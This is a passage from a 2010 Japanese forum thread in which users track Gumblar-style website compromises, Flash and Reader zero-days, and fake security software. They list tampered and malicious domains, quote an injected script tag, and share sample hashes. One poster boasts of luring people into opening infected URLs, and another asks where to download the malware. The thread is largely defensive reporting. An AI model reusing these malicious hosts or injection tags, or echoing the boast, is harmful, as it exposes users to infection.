('д')でもそんなに悔しかったら俺様のようにコテつけて堂々と書き込めばいいのにね
221:('д') ◆yUyb3Tqn92
10/09/11 00:32:05
いろいろな有名なサイトまでが被害に遭っているが
中には俺様が踏ませたことによって感染につながった連中もいるのだろうな
(*'д'*)でも俺様ぴんぴんしてるおw
踏ませるだけなら加害者でも被害者でもない
なので第三者同然(>w<)メシウマ爽快学会!
222:('д') ◆yUyb3Tqn92
10/09/11 00:35:35
ホント過疎ってるなこのスレ
先に立ったあのスレで>>1のスレ番ミスを厳しく指摘した上に死ねとまで言った効果は抜群だったか
223:名無しさん@お腹いっぱい。
10/09/11 00:43:22
>>220
お前が勝ちなのは当然だろ
街中歩いてて通り魔に刺されるなんて思ってる奴いないんだから
お前に突然危険URL踏まされる奴らだって同じこと
224:('д') ◆yUyb3Tqn92
10/09/11 01:11:03
全然同じじゃねーだろ
ウィルスURL踏むのは踏む奴の意思で踏んでるわけだからな
('д')俺様はそいつが踏むように心理誘導してるだけ
ネットやってて自分がウィルスかからないと思ってURL開いてる奴がいるとしたらそいつは低脳以外何者でもねーぜ
そういう意味じゃ俺様がやってることは確かに正義と言っても過言ではないかもな。必要悪という名の正義があっても良いと思うんだ(w)
225:名無しさん@お腹いっぱい。
10/09/11 01:16:16
>>224
ちなみにアンチウイルスソフトは何を使ってるの?
やっぱ情弱御用達のavast!かなw
226:('д') ◆yUyb3Tqn92
10/09/11 02:10:39
>>225
おいおい(>w<)
てことはお前アンチウィルスソフトに頼ってるのか?(>w<)プクーススススwwwww
お前みたいにどんなソフトを入れてればいいかどうかって考えてる時点で不合格。
情弱乙(>w<)レベル低っ!
( 'д' )やっぱ俺様って論破の天才だね
227:('д') ◆yUyb3Tqn92
10/09/11 02:13:15
そして人をムカつかせるのが得意だな(@'д'@)←この顔文字余計ムカつくでしょーwえへへーwww
228:名無しさん@お腹いっぱい。
10/09/11 02:15:57
その顔文字好きだからずっと使ってね
229:名無しさん@お腹いっぱい。
10/09/11 02:18:48
スキルないくせに態度だけはでかいな糞ガキ
230:('д') ◆yUyb3Tqn92
10/09/11 02:20:03
( 'д' )
231:('д') ◆yUyb3Tqn92
10/09/11 02:21:23
( 'д' )
お や す み
232:('д') ◆yUyb3Tqn92
10/09/11 02:22:22
( 'д' )
233:名無しさん@お腹いっぱい。
10/09/11 02:27:00
>>229
そうやって頭にきた素振り見せると余計顔文字喜ばせるだけだぞ
それに>>225-226は確かにお前より顔文字の方が正論だから仕方ない
234:名無しさん@お腹いっぱい。
10/09/11 02:28:48
>>231
おれはお前好きだ
このスレ頭固い奴ばかりだから
またきてくれ、おやすみ
235:名無しさん@お腹いっぱい。
10/09/11 02:31:00
バレバレの自演するなよ
低脳だからこれくらいが限界か
236:↑
10/09/11 03:02:28
IDないスレで自演自演言う奴ってwwww
そんなに必死になるならIDあるスレいけよ低脳wwwww
237:名無しさん@お腹いっぱい。
10/09/11 03:03:37
やべ俺まで正論言っちまったwwww
238:名無しさん@お腹いっぱい。
10/09/11 07:50:35
>>232
FF14スレにも出没してたでしょ
FF14ゲーム内のgumblarってもしかしてあなた?
239:名無しさん@お腹いっぱい。
10/09/11 08:01:53
ID無くてもなんかわかっちゃうな…
エスパー養成講座みたいだ
240:名無しさん@お腹いっぱい。
10/09/11 11:06:56
『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。
顔文字のためにあるような諺(ことわざ)だなw
241:名無しさん@お腹いっぱい。
10/09/11 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか
242:名無しさん@お腹いっぱい。
10/09/11 11:10:38
240 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:06:56
『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。
顔文字のためにあるような諺(ことわざ)だなw
241 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか
顔文字にコケにされて悔しいのはわかるが
自演下手すぎ^^;せめて一分以上は時間あけようぜ
あw残念ながら俺はお前が戦ってる顔文字じゃないからね!悪いが^^
243:名無しさん@お腹いっぱい。
10/09/11 13:36:14
あれをコケにしてやったと思ってるのか
244: ◆jvtzoP47MMGU
10/09/11 17:03:00
構ってちゃんに構うお前らもどうかと思うけど(;^_^)
なんで無視できないでレス返すんだろ(;^_^)
245:名無しさん@お腹いっぱい。
10/09/11 17:05:46
iswebが終了すると聞いて
自分のサイトの別館があるgeocitiesのファイルマネージャを1年ぶりくらいに開いたら
スクリプトタグが大量に書き込まれていて広告ページが勝手に作られていた
これはもうだめかね
246:名無しさん@お腹いっぱい。
10/09/11 19:16:04
iswebww
おまえわおれか。
10月に追い出されるよー、めんどくさいよー。
247:名無しさん@お腹いっぱい。
10/09/12 12:43:09
本家のWebGetterって今死んでますよね?
248:名無しさん@お腹いっぱい。
10/09/12 18:07:33
"Canadian Pharmacy" domains
URLリンク(www.mywot.com)
.ru 多すぎだろw
249:名無しさん@お腹いっぱい。
10/09/12 18:27:01
誰かリスト作ってくれないかな
250:名無しさん@お腹いっぱい。
10/09/12 18:58:50
言い出しっぺの法則
251:名無しさん@お腹いっぱい。
10/09/12 19:10:26
言いだしっぺは今期も知識もないヘタレの法則
252:名無しさん@お腹いっぱい。
10/09/12 19:41:29
>>249
WOT入れろよ
253:名無しさん@お腹いっぱい。
10/09/13 13:59:18
新ドメインきたー
scarystroke●ru/●●●●.js
254:名無しさん@お腹いっぱい。
10/09/13 23:21:16
>>249
まあ「自分だけが本質を解っている」妄想がここまで強いともう矯正不可能だろうね
255:名無しさん@お腹いっぱい。
10/09/14 00:53:32
ホームページに関する報告とお詫び
URLリンク(www.sumori.jp)
McAfee SiteAdvisor
URLリンク(siteadvisor.jp)
改竄されてたことを正直に書かないのに「正直な家造り」ですか・・
256:名無しさん@お腹いっぱい。
10/09/14 01:15:32
SANSPO.COM
日本に「報復」!中国ハッカー組織が攻撃宣言
URLリンク(www.sanspo.com)
攻撃増えるらしい
257:名無しさん@お腹いっぱい。
10/09/14 23:51:41
「Flash Player」にゼロデイ攻撃--「Adobe Reader」と「Acrobat」にも影響
URLリンク(japan.cnet.com)
またおまえ(Adobe)か!
258:名無しさん@お腹いっぱい。
10/09/14 23:57:12
BADbe…
259:名無しさん@お腹いっぱい。
10/09/15 09:50:30
しかもこれ再来週まで治らないだと?ふざけんじゃねえよ・・・
ニコニコも一時閉鎖するくらいしないとダメじゃねえか?
260:名無しさん@お腹いっぱい。
10/09/15 16:23:55
アドベの社員は全員毒殺銃殺絞首刑に処すべき
261:名無しさん@お腹いっぱい。
10/09/16 00:15:41
>>260
それだと脆弱性放置になってしまうから
社員全員24時間勤務(休憩無し・メシ抜き)で最速対応のほうが…
今後ゼロデイが発覚したら社員全員尻叩き1万発
※重役の尻叩きの様子はようつべで公開
262:名無しさん@お腹いっぱい。
10/09/16 07:31:10
まあニコニコで騒ぎになってないなら大丈夫だろ
263:名無しさん@お腹いっぱい。
10/09/16 07:39:42
この場合、危険なのは動画サイトだけ?
それとも動画サイト以外もこのゼロデイの対象なのかな
264:名無しさん@お腹いっぱい。
10/09/16 07:52:25
なんで動画サイト限定なんだよ
Flash全てだよ
265:名無しさん@お腹いっぱい。
10/09/16 09:06:07
ハッカーが仕組んだ動画やFlashのページに行っただけでアウトっぽいな
こっちで先に読みこんじゃってるからなぁ
266: ◆DNq5bDQQkRSz
10/09/16 09:50:53
>>261 結局社員が過労死する訳か
267:名無しさん@お腹いっぱい。
10/09/16 13:52:17
>>265
俺はFirefox+Stop Autoplayに避難した
268:名無しさん@お腹いっぱい。
10/09/16 14:11:01
まぁYouTube見るだけならHTML5対応ブラウザで
URLリンク(www.youtube.com)
で有効にすりゃFlash使わんで済むな
269:名無しさん@お腹いっぱい。
10/09/16 18:11:20
gnashに変えた。
いつも見てるページは問題ないみたいだからこのまま行こうかな。
270:名無しさん@お腹いっぱい。
10/09/17 12:37:30
俺はエロページの新規探索をしないことにした
271:名無しさん@お腹いっぱい。
10/09/17 13:28:39
>>269
グナッシュ重くね?動画だけでなく普通のFlashもクソ重いんだけど
ただアドベのタダメシ喰らい共には二度と世話に
なりたくない点では迷いなく同意だが
272:名無しさん@お腹いっぱい。
10/09/19 16:20:16
Security Advisory for Flash Player
URLリンク(www.adobe.com)
Adobe Flash Playerは米国時間9月20日にリリース
Google Chrome内蔵Flashは10.1.85.3に本日更新済み
273:名無しさん@お腹いっぱい。
10/09/19 18:35:01
やっとかよ
274:名無しさん@お腹いっぱい。
10/09/20 18:08:25
10月とか言ってなかったっけ
まあいいけど
275:名無しさん@お腹いっぱい。
10/09/20 18:16:25
10月はAdobeReader(Acrobat)
276:名無しさん@お腹いっぱい。
10/09/20 20:09:55
褒める価値もない これくらいやるのは企業として当然の義務
277:名無しさん@お腹いっぱい。
10/09/21 04:03:40
Flash Player 10.1.85.3 キタ!
278:名無しさん@お腹いっぱい。
10/09/21 07:14:16
今更かよ何やってたんだこのクズ企業
279:名無しさん@お腹いっぱい。
10/09/21 09:38:47
クズ起業のソフト使わないといけない奴もクズなんだよな
280:名無しさん@お腹いっぱい。
10/09/21 11:17:30
流れ的に見て
>>205の影響で最近URL貼るの自重してるんだな
新しいの見つけたので貼ろうと思ったが自重しとく
281:名無しさん@お腹いっぱい。
10/09/21 11:29:06
凸してる側の俺としては、報告はありがたいのだが。
282:名無しさん@お腹いっぱい。
10/09/21 13:15:34
悪用されたところで、ちゃんとアップデートしていれば問題ないんだし、
これだけ騒がれて未だにアップデートもしないずさんな奴は
自重しても別のウィルスに感染するだろ。
283:名無しさん@お腹いっぱい。
10/09/21 13:18:10
だな。
というか1匹のアホのせいで情報の提供・共有に臆するようになったら本末転倒じゃね。
284:名無しさん@お腹いっぱい。
10/09/21 16:09:58
>>280
8080が一時撤退していたからな
現在、放置サイトを中心に新ドメインで再起動中
44Gr44GC44GG44G144GP44Gp44Gj44Go44GT44KA
ここみればわかるんじゃね?
285:名無しさん@お腹いっぱい。
10/09/21 20:48:35
>>284
不定期で観測してるけど
また、動きあったん?
てか、今見たら飛び先の飛び先がまた変わってた。。。おrz。。。。
よく見たら別のXの蜜壷化してるとこの飛び先になってた。
つーことは8080じゃなくてXだったんか>>284
286:名無しさん@お腹いっぱい。
10/09/21 20:58:36
>>285訂正
ホスト勘違いすた。
>>285は忘れてちょ。m(_ _)m
287:名無しさん@お腹いっぱい。
10/09/21 22:07:24
>>286
下段のphp
・jsunpack
09d45fc74d80a65f539b612e6a90739abfe61186
288:名無しさん@お腹いっぱい。
10/09/21 23:16:59
>>287
ノ
あらら、中身かわっちゃたのねぇ。。。
自分が投げた時の
fc588961ef3119b8dc764166e8454389983601ff
昨日検体送った分で、>>287の飛び先もあったからどーすべ。
289:名無しさん@お腹いっぱい。
10/09/21 23:48:52
>>287
とりあえず送ったお。
jsunpack使わせていただきました。m(_ _)m
(何度もアクセスさせるとjsunpackも拒否られるようなので。)
290:名無しさん@お腹いっぱい。
10/09/21 23:55:36
久しぶりにきたら、アホが復活してるのね・・・
フラッシュプレイヤー、更新したほうが良い?
291:名無しさん@お腹いっぱい。
10/09/22 00:04:05
んなアホな質問するような人は来なくていいです
292:名無しさん@お腹いっぱい。
10/09/22 01:00:36
>>290
そのまま阿呆に死ね
293:名無しさん@お腹いっぱい。
10/09/22 01:22:29
ここの住人は陥落サイトを発見できるスキルのある人が選民意識を持ってやってる
初心者はうせろ
294:↑
10/09/22 02:36:22
自己紹介は他所でやれ
あるいは死ね
295:名無しさん@お腹いっぱい。
10/09/22 12:07:47
またアンタか…つくづく暇な奴だな
296:↑
10/09/22 13:02:27
またアンタか…つくづく暇な奴だな
297:名無しさん@お腹いっぱい。
10/09/22 16:12:54
取扱注意
www●okestyles●com/mainframe●asp?c=1 (~529あたりまで延々と...)
※改竄を放置したまま下記サイトに逃亡
www●okestyleszakka●com
アクセス注意
en-trance●co●jp
※>>130参照
完璧にオワタwwwwwww
298:名無しさん@お腹いっぱい。
10/09/22 19:38:06
>>297
おちゅ。
JPCERT/CCにもめるぽすた。
299:名無しさん@お腹いっぱい。
10/09/23 23:44:50
en-trance●co●jp
またコードが変わったなw
300:名無しさん@お腹いっぱい。
10/09/24 04:33:31
>>299
今度は伊太利亜語れすか。。。
aHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZV90P3RleHQ9YXVtZW50YXJlJTIw
Y29tZSUyMGwlMjBlcmV6aW9uZSUyMHRoZSUyMG9mJTIwZmFybWFjbyUyMHpvbG9mdCUyMHR3byUy
MHJlbWFpbnMlMjBjaGVhcCUyMGdlbmVyaWNzJTIwc2l0ZXMlMjBzaXRlcyUyMHRvJTIwYW5kJTIw
aW1wb3RlbnphJTIwc2ludG9taSUyMHByZXNjcmlwdGlvbiUyMHBvc29sb2dpYSUyMHBsYW5uaW5n
JTIweGFuYXglMjBhbGxlcmdpYSUyMHBwZCUyMHRoZSUyMGElMjBhY2NvdW50JTIwb2YlMjBhZGRz
JTJDJTIwdGhlJTIwYmUlMjBjbGElMjBtZWdhJTIwZXhhbWluaW5nJTIwYW5kJTIwc2VyaW91cyUy
MGFyZSUyMHNjaWVudGlzdHMlMjBpdCUyMGZyaWVuZHMlMkUlMjBtZXJjZWRlcyUyMGNsYSUyMDI5
JTIwc2FmZXR5JTIwcHJhY3RpdGlvbmVycyUyMGludGVyYWN0aW9ucyUyMG1vZHVyZXRpYyUyMHBl
ciUyMGRpbWFncmlyZSUyMHNpdGVzJTIwZGklMjBwZXIlMjBzbWV0dGVyZSUyMGZ1bWFyZSUyMGxp
YnJvJTIwb2ZmZXJlZCUyMGElMjBpbCUyMHVuaXZlcnNpdHklMjBhbiUyMGxldHRlcnMlMjB0byUy
MGlzJTIwc3BvcnQlMjBncmF2aWRhbnphJTIwYXZlcmFnZSUyMGElMjBQcm90ZWN0aW9uJTJFJTIw
YXJ0cml0ZSUyMGFjdXRhJTIwSW4lMjBubyUyMHdpdGglMjBhbmQlMjBuZWVkJTIwcGlhbmNhdmFs
bG8lMjBkaW1hZ3JpbWVudG8lMjBzdGF0ZSUyMGNlbnRybyUyMGtpbmQlMjBtaWNhcmRpcyUyMGJv
ZWhyaW5nZXIlMjBhbmQlMjB3aG9sZSUyMGFsaSUyMGxlJTIwYXByaSUyMGNvbXBhbnklMjB0aGF0
JTIwc291cmNlcyUyMGlzJTIwdGhlJTIwdGhlJTIwZGlhYmV0ZSUyMGludGVybmV0JTIwdG8lMjBw
cmV2ZW56aW9uZSUyMEluYyUyRSUyQyUyMGluY2x1ZGluZyUyMHA1MyUyMGUlMjBjYW5jcm8lMjBw
cm92aWRlJTIwc29jaWFsJTIwZW50cmVwcmVuZXVyJTIwYXdhcmQlMjBwcmVzY3JpcHRpb24lMjBk
YW5nZXIlMjBpbnZvbHZlZCUyMHBhcnQlMjBkaWFiZXRlJTIwYXR0aXZpdGElMjBmaXNpY2ElMjBh
Ym91dCUyMGlzJTIwc3RheSUyMHNlZ25vJTIwc2NvcnBpb25lJTIwZW5zdXJlJTIwc3VjaCUyMGFs
bGVyZ2lhJTIwYWdsaW8lMjBwb3dlcnMlMjBmZXclMjBvZiUyMGFuZCUyMHBhc3QlMjBjYXB0b3By
aWwlMjBlbmFsYXByaWwlMjBleWUlMjBzYXlzJTIwdGVybWlub2xvZ3klMjBGVENzJTIwYSUyMElu
JTIwZm9iaWElMjBzb2NpYWxlJTIwdGhlJTIwbmFtZSUyMGNvbmNlcm5zJTJDJmxhbmdwYWlyPWl0
fGphJmhsPWphJmllPVVURjgj
301:名無しさん@お腹いっぱい。
10/09/24 04:41:41
>>300σ(゚∀゚ ∬オレだけど、ぐぐる翻訳のバグかな?
英語だとgdgdになっちゃう。
302:名無しさん@お腹いっぱい。
10/09/24 07:48:59
>>299
これもガンブラーなんだ
303:名無しさん@お腹いっぱい。
10/09/25 07:08:29
なんか、こんな事が起きて
URLリンク(slashdot.jp)
こんな事になってるらしい
スレリンク(news4vip板)
スレリンク(sec板:630-633番)
304:名無しさん@お腹いっぱい。
10/09/25 10:04:10
リンク貼る前に口頭で説明しろ
305:名無しさん@お腹いっぱい。
10/09/25 13:34:19
「security tool」に感染した方へ
よくわかってない人が書いてるsecurity toolの削除方法では
8080の本体(高機能ダウンローダー)のほうを潰してないので、
セキュリティ的には何もしてないのと同じです(まともに動くようにしただけ)
8080の本体を潰さない不完全な削除はらネットに繋いでるだけで他人に迷惑をかけている(可能性が非常に高い)ので、
必要なデータをバックアップした後にリカバリ(クリーンインストール)を行って下さい。
※複数のセキュリティソフトで膨大な時間を費やして不完全な削除(HDDをゴリゴリ鳴かせて寿命を縮める)より、
リカバリ一発のほうが遥かに早くて確実です。
306:名無しさん@お腹いっぱい。
10/09/25 14:13:06
security tool削除で以前話題になったサイト、
1000円払えば教えてくれるらしいよ
URLリンク(8.pro.tok2.com)
307:名無しさん@お腹いっぱい。
10/09/25 14:53:29
security toolってどういう状況で感染するんだ
308:名無しさん@お腹いっぱい。
10/09/25 15:08:03
無防備都市
309:名無しさん@お腹いっぱい。
10/09/25 15:15:48
>>2,3の対策してなければやばい
Webシールド機能無しのセキュリティソフトも微妙
310:307
10/09/25 15:27:12
感染動画とかあれば見てみたいな
311:名無しさん@お腹いっぱい。
10/09/25 15:55:48
>>310
YouTube - 「衝撃!!ウイルス感染のその瞬間 前編」
URLリンク(www.youtube.com)
312:307
10/09/25 16:02:01
偽セキュリティーソフトがインスコされるのか
313:名無しさん@お腹いっぱい。
10/09/25 16:30:44
>>307
発言がいちいち恥ずかしいから黙ってみてろ
314:名無しさん@お腹いっぱい。
10/09/25 19:18:31
>>306
あのくそじじい・・・まだ懲りてないのかwww
315:名無しさん@お腹いっぱい。
10/09/25 23:01:24
不正プログラム:毎日jpなど被害 広告配信データ改ざん
URLリンク(mainichi.jp)
316:名無しさん@お腹いっぱい。
10/09/26 00:21:30
今回の改ざんでWMPが起動したって書き込みをちらほらと見かけるんだが、WMPになんか脆弱性あったっけ?
317:名無しさん@お腹いっぱい。
10/09/26 02:22:23
>>316
ヒント:自動再生
318:名無しさん@お腹いっぱい。
10/09/26 02:47:42
今回のパンデミックで日本にはセキュリティソフトに依存してるバカが異常に多いという事がよくわかった
319:名無しさん@お腹いっぱい。
10/09/26 03:17:03
>>317
自動再生ってリムーバブルディスク挿した時とかのアレ?
320:名無しさん@お腹いっぱい。
10/09/26 05:10:15
jsunpackの調子がおかしいっぽいのは漏れだけ?
321:名無しさん@お腹いっぱい。
10/09/26 17:30:12
なんかもう完全に日本だけが狙い撃ちにされてんな
322:名無しさん@お腹いっぱい。
10/09/26 23:34:09
ソフトウェアのアップデート切ったり、サポート切れたOSを使い続けたりしてるんだから狙い撃ちにされて当然
323:名無しさん@お腹いっぱい。
10/09/27 03:02:38
時期的に考えてチャイニーズ・ニート(スーパーハカー)の仕業だろ
船長の件で「あんな事(保障しろとか、無茶苦茶な要求まで)」言われてるんだから
日本もスーパーハカーにやられたサイトの復旧費用を請求すべき
200兆円くらい()笑
324:名無しさん@お腹いっぱい。
10/09/27 07:57:36
【GENOウイルス】GIGAZINEの広告がウイルス感染、他のサイトでも同様の被害か
スレリンク(news板)
325:名無しさん@お腹いっぱい。
10/09/27 09:24:13
クソサイト
URLリンク(gumblar8080taisaku.com)
またECスタジオのEset宣伝サイト
326:名無しさん@お腹いっぱい。
10/09/27 17:00:05
メルアド収集サイト
327:名無しさん@お腹いっぱい。
10/09/27 17:20:35
>ガンブラーのような未知のウィルスに対し
>圧倒的に強いセキュリティソフトはESET Smart Securityです
ワロタwwww
328:名無しさん@お腹いっぱい。
10/09/27 22:45:12
まだやってやがんのかよGumblar作者はよ!
ほんと殺してやりてぇ
329:名無しさん@お腹いっぱい。
10/09/27 23:19:58
>ガンブラー制作者
いい加減に捕まえてほしいねぇ・・・
ただ、実際に捕まるのは。三流制作者の原田ウイルスやKenzeroぐらいだよなぁ・・・
あれはアホすぎ。
330:名無しさん@お腹いっぱい。
10/09/27 23:23:20
つーか、ただの実行ファイルを配って、ユーザーに実行させている時点で
そもそもあれはウイルスじゃないよな。
331:名無しさん@お腹いっぱい。
10/09/28 02:01:35
新種のガンブラーは去年の12月23日くらい騒ぎになったんだっけ?
で、アドビは休みに入るから対応遅れるけど よろしくねー的な対応だった気が・・・
332:名無しさん@お腹いっぱい。
10/09/28 05:06:07
>>331
あれは酷かった・・・
さんざん機能拡張した挙句
脆弱性だらけのものを作っておきながら
感染拡大状態から対応に約一ヶ月かかった。
URLリンク(www.so-net.ne.jp)
333:名無しさん@お腹いっぱい。
10/09/28 06:50:08
今もAdobeReader放置のままだしね
来月4日「の週」の予定
334:名無しさん@お腹いっぱい。
10/09/28 10:40:45
readerなんて使わねーだろ
335:名無しさん@お腹いっぱい。
10/09/28 13:02:04
pdfはサンドボックスで開くようにすればいい。
336:名無しさん@お腹いっぱい。
10/09/28 13:25:21
【ゼロデイ多発】Adobe≒Badbe【叩きサラダ】
337:名無しさん@お腹いっぱい。
10/09/28 14:17:18
取扱注意
tukaoh●com/index●html
338:名無しさん@お腹いっぱい。
10/09/28 22:21:55
ドライブ・バイ・ダウンロード攻撃によるAdobe Readerゼロデイ脆弱性の悪用
URLリンク(www-950.ibm.com)
339:名無しさん@お腹いっぱい。
10/09/29 03:13:45
みんな、なんであれだけ脆弱性でやられまくっても、
XPやFirefox使い続けるんだろ?
Vista以降・IEで保護モードオンorChrome・一般ユーザーでログイン
の3つを組み合わせたら相当安全性高まるのにね
340:名無しさん@お腹いっぱい。
10/09/29 03:16:00
このまえアップデートされたFlash最新版では、特定サイトで数十秒間フリーズするっていう問題があって、
たまにそれにあうな
サードパーティーのFlashクッキーを受け入れない設定にしてニコニコ動画見た場合とかそれにあう
その他にも条件不明だけどたまに数十秒間フリーズするサイトがある
341:名無しさん@お腹いっぱい。
10/09/29 03:25:32
>>340
動画サイトを見ていてそうなったことがあったかも。
その現象について書かれたサイトってあったりする?
以前のverのFlashだと脆弱性があるって聞くし、
アップデートしといた方が良いんだろうけど、
ブラウザごとのフリーズくらいなら我慢するしかないのか・・・
342:名無しさん@お腹いっぱい。
10/09/29 10:01:49
サードパーティーのクッキーとかはサイトごとに保存するかどうか設定できなかったっけ
343:名無しさん@お腹いっぱい。
10/09/29 17:41:31
APSB10-22がfixされたラボのFlashPlayer10.2preview2はどうよ?
人柱版なんで別の未知の穴あいてるかもしれないけど
344:名無しさん@お腹いっぱい。
10/09/29 19:03:45
>>339
基本的な対策を怠ってる愚か者は何を使っても喰らうから、OSとかブラウザはあまり関係無い。
そして真の愚か者は、HIPSが止めたものを確認もしないで「はい(実行)」を押して感染するw
345:名無しさん@お腹いっぱい。
10/09/29 19:40:58
security toolをダウンロードしたいんだが、まだDl可能なURLある?
346:sage
10/09/30 01:40:23
マイクロソフト セキュリティ情報 MS10-070 - 重要
ASP.NET の脆弱性により、情報漏えいが起こる (2418042)
URLリンク(www.microsoft.com)
NET Frameworkオワタ
347:名無しさん@お腹いっぱい。
10/09/30 03:28:08
パッチ済みなのに何を言ってるんだ
348:名無しさん@お腹いっぱい。
10/10/01 23:48:50
>>345
なんに使うん?
広告サーバー改竄でSecurityToolがアップロード
されてた所はまだ稼動しておるが
349:名無しさん@お腹いっぱい。
10/10/02 08:07:29
なんに使うって…そりゃ悪い事だよなァ?
350:名無しさん@お腹いっぱい。
10/10/04 02:00:31
URLリンク(www.microad.jp)
>弊社にて確認したところ9月24日23:30頃には悪意あるサイトへの転送は停止しておりました。
25日1時ごろまでドライブバイ・ダウンロード状態だったはず
GIGAZINEでの確認も9月24日(金)23時59分22秒だし↓
URLリンク(gigazine.net)
詳細を告知すりゃ名誉挽回できるのに残念
351:名無しさん@お腹いっぱい。
10/10/04 02:02:58
残念とか関係者か?
どうでも良いだろ
352:名無しさん@お腹いっぱい。
10/10/04 02:10:44
よく理解できないがそのサイト張りまくってるのはその件に関係してるのかな
353:名無しさん@お腹いっぱい。
10/10/04 02:34:27
詳細が告知されれば、同様被害を減らせるでしょ
改竄されたのは残念だけど、失敗の経験を共有したい
繕うとすると可笑しなことに↓なるし
URLリンク(mimizun.com)
354:名無しさん@お腹いっぱい。
10/10/04 02:44:41
残念でも何でもないが
意味が分からないな
355:/名無しさん[1-30] ◆.htmlint.U
10/10/04 07:06:03
漏れが件の広告枠をダンさんとこで最終確認したのは 2010/09/24 23:16 頃だたぁーよ。
>>303の頃にはメルしてた。
広告枠のタグのアドレス→転送サイト自体が蹴りまくっていたようなので環境によっては>>350になるかも。(転送先アドレスも含めてダンさん蹴られてた。)
aguseで転送サイトから転送先アドレスの最終確認は 2010/09/25 01:38 頃。
356:名無しさん@お腹いっぱい。
10/10/05 18:42:56
取扱注意
www●cyg●jp/
>サイバーギグスのWEBサイト制作は(中略)1ページ1万円という低価…
↓
www●movie-aa●com/
<title>サイバーギグス|PV制作|専門用語集|-あ行-|
<script src=http://pop●dj/en/sitemap●php ></script>映画とは?</title>
他人の心配をする前に、自社のサイトが改竄されてるのを何とかしてくださいw
【Google先生の診断結果】
www.google.com/safebrowsing/diagnostic?site=www●movie-aa●com/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
>Google が最後にこのサイトを巡回したのは2010-09-30で、このサイトで不審なコンテンツが最後に検出されたのは2010-09-30です。
ぐっじょぶwwwww
357:/名無しさん[1-30] ◆.htmlint.U
10/10/05 20:02:24
>>356
otu
JSUNPACK
f6e5de3faf0333e2e04d04c1ad02c0562cee14c7
6bbf617a256b2c06b91fcf74daad67035fa0a410
VIRUSTOTAL.
b6cf294f8fc9ecfe0a57ec6ee74f751ec3479aeba7b85265839bec7c36a4f6ba
daeea74be1aced7dfee6065d8eaa0b7b168faf1368e5bac8d327cc522153bab7
タグはDanさんとこ蹴っている。。。
358:/名無しさん[1-30] ◆.htmlint.U
10/10/05 20:51:21
めるぽかんりょ
359:/名無しさん[1-30] ◆.htmlint.U
10/10/05 23:55:36
>>357
つづき
Avira対応予定
HTML/ScrInject.G
JS/Dldr.Agent.abb
あきたねる
360:名無しさん@お腹いっぱい。
10/10/06 18:29:30
こういった底辺web制作会社のPCがトロイにやられて、担当する顧客のwebサイトの
FTPパス抜かれまくって改竄されるんだろうな
361:名無しさん@お腹いっぱい。
10/10/06 20:37:11
こんなもん感染するわけないじゃん。
362:名無しさん@お腹いっぱい。
10/10/07 23:33:42
>>357-359 乙乙
取扱注意
・google-statsXX系
www●snowfan-mimo●com/area/area-service●asp?sID=467
sID=XXXが全滅の予感
【Google先生の(ry
www.google.com/safebrowsing/diagnostic?site=www●snowfan-mimo●com/&hl=ja
>146 ページのうち 74 ページで、ユーザーの同意なしに不正なソフ…
363:/名無しさん[1-30] ◆.htmlint.U
10/10/08 00:15:32
>>362
こちらの環境では500返ってきます。
ヤホのキャッシュで確認しましたが誘導先のstats50はないようです。。。
スクリプトを抜き出してVTに投げてみました。
833e2f264ae0ec69445fdc6d070312b564654cd72480b8c1465478401af77658
とか、やってるうちに>>362繋がった。
55ってのもあるんか。。。
ワイルドカードなんかな?
364:/名無しさん[1-30] ◆.htmlint.U
10/10/08 01:07:32
>>362
あらためて乙ですた。
めるぽかんりょっす。
365:名無しさん@お腹いっぱい。
10/10/08 16:19:43
googleの検索結果にこう出てるんですけど、やっぱり感染してるのかな?
ツール・ド・安倍峠 - MCプロダクトのページ
このサイトはコンピュータに損害を与える可能性があります。
2010年8月20日 ... ツール・ド・安倍峠 大会事務局 佐藤 治史(サトウ ハルフミ) ※入金の確認が取れた方には、事務局より参加受理書をお送りいたします。 ※ネット銀行よりお振込される方は、 振込先を全て入力して下さい。 ...
www●mc-pro●co●jp/abetouge/abetouge.html
366:/名無しさん[1-30] ◆.htmlint.U
10/10/08 19:04:16
>>365
こんなことがあったようです。(>>353を参考にみてくださいな)
スレリンク(bicycle板:820-871番) (820、830、836、871)
深くは見ていないので他の方のご意見・報告もお待ちくださいな。
>>362
404になったっぽい。
Avira対応予定
HTML/SrcInject.C
HTML/SrcInject.L
HTML/SrcInject.M
HTML/SrcInject.N
HTML/SrcInject.O
367:名無しさん@お腹いっぱい。
10/10/08 19:36:10
>>365
静岡市・身延町交流イベント実行委員会 静岡市側 に凸。
市役所に繋がりました。市役所から業者に問い合わせるそうです。
>>366
●がないからみれにゃい。。
368:/名無しさん[1-30] ◆.htmlint.U
10/10/08 19:58:56
>>367
乙です乙です。
> ●
>>366の スレリンク(bicycle板:820-871番) を>>353のようにすると過去ログがある場合もあります。
mimizun.com/log/2ch/bicycle/1274359715/820-871
(直リンするとみみずんさんの負担が大きいので>>366にしました。)
みみずんさんとこに無い場合もありますん。
2ch DAT落ちスレ ミラー変換機
URLリンク(mirrorhenkan.g.ribbon.to)
それでも無いことも。。。
●があればパーペキなんですけど。。。orz.....
369:名無しさん@お腹いっぱい。
10/10/08 20:14:52
>>368
みっけ
URLリンク(2chnull.info)
370:名無しさん@お腹いっぱい。
10/10/08 20:15:54
>>365
そのページとトップページを見たけど不正コードを確認できない
Googleも最後の検知日が9/20でもう時間が経っちゃてる
ハッキングされてたのは間違いなんだろうけど
Google警告は管理者が対処完了報告しないと一定期間は消えない
371:名無しさん@お腹いっぱい。
10/10/09 17:09:46
エロ漫画検索してて遭遇したページなんだけど、
開くとメディアプレイヤーアドオンを要求。
で、そのコードが</html>の後にあるのがちょっと怪しい。
blogs●yahoo●co●jp/tmoebooks/2463230●html
どうなんだろ、ここ
372:名無しさん@お腹いっぱい。
10/10/09 17:29:45
判定スレじゃないよここは
